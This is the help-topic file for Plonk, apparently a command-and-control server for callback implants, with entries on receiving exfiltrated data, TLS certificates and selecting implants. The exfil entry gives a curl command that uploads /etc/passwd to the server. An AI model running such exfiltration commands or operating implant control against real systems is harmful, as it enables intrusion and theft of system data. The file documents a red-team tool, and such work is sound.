# help.txtar
# ,help topic text
# By J. Stuart McMurray
# Created 20231229
# Last Modified 20240120

This file contains the information returned by ,help [topic].  Each topic
starts with the topic name in --'s, has a one-line description used for
,help topics, and then contains the rest of the help text.

-- exfil --
Sending back largeish chunks of data

Largeish amounts of data can be stored in <plonkdir>/exfil by sending the data
in the body of an HTTP request to /p/<path>.

It is helpful to set the first element of the path to the ID of the target from
which the exfil is being received; besides making it easier to remeber which
file comes from where, received exfil will be shown when that ID has been
selected with ,seti.

Example:

curl -T /etc/passwd https://example.com/p/kittens/etc/passwd

will store /etc/passwd in <plonkdir>/exfil.

-- TLS --
TLS certificate generation

By default, Plonk generates a single self-signed TLS certificate used for any
TLS connection.  The SNIs which an implant must present may be restricted with
the -self-signed flag.

Proper TLS certificates may be obtained from Let's Encrypt by pointing a domain
name at Plonk and using -letsencrypt.  Make sure Let's Encrypt can reach Plonk
on port 443

-- ,i --
Implant selection

Implants all call back with an ID, given as part of the URL after /t or /o.  To
interact with one, use the ,i command with an ID, like
        ,i 10nv-kittens-44222
to select the implant 10nv-kittens-44222 or for a list of previously-seen IDs
use ,i by itself.


There are two pseudo-IDs which can be used with ,i:

-last - Uses the ID of the last-seen implant (i.e., top of the list from
        ,i-with-no-ID).
-next - Waits for the next new implant to connect, and uses that.  The current
        ID won't change until a new implant is seen.
